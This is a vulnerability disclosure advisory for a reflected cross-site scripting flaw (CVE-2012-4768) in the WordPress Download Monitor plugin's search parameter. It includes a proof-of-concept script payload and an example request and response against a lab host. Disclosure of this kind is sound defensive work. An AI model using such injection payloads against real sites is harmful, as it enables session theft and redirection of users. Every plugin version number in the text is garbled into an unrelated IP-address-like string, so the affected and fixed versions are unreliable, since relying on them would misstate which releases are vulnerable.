Wordpress Download Monitor 220.127.116.11 Cross-Site Scripting
Wordpress Download Monitor 18.104.22.168 is subject to a cross-site scripting vulnerability. The 'dlsearch' parameter is not sufficiently sanitised before being written to pages including the '[download_page]' shortcode. An attacker could distribute a malicious URL as part of a phishing campaign. Users following the link would trigger this vulnerability which could potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine.
- CVE number: CVE-2012-4768
- Impact: Medium
- Vendor homepage: http://mikejolley.com/
- Vendor notified: 30/08/2012
- Vendor fixed: 30/08/2012
- Credit: Chris Cooper and Joseph Sheridan of Reaction Information Security
Reaction Information Security is a leading independent pen test consultancy specialising in delivering the highest quality security testing services including network pen testing and web application security testing. As a CESG CHECK Service Provider we are authorised to carry out penetration testing on classified government networks.
Confirmed in Wordpress Download Monitor 22.214.171.124. Versions prior to 126.96.36.199 may also be affected.
"><script>alert('xsstest')</script> --- Example Request: +--------------- GET /wp/?dlsearch="><script>alert('xsstest')</script> HTTP/1.1 Host: 192.168.0.6 --- Example Response: +---------------- --- SNIP --- <form id="download-page-search" action="" method="post"> <p><label for="dlsearch">Search Downloads:</label> <input type="text" name= "dlsearch" id="dlsearch" value=""><script>alert('xsstest') </script>" /><input class="search_submit" type="submit" value="Go" /><input type="hidden" name="page_id" value="2" /></p></form><h3>Results found for <em>""><script>alert ('xsstest')</script>"</em> <small><a href="http://192.168.0.6/wp/">« Downloads</a></small></h3> --- SNIP ---
Upgrade to WordPress Download Monitor 188.8.131.52
In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.
- bugtraq () securityfocus com
- full-disclosure () lists grok org uk
Future updates of this advisory, if any, will be placed on the ReactionIS website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the current page for any updates.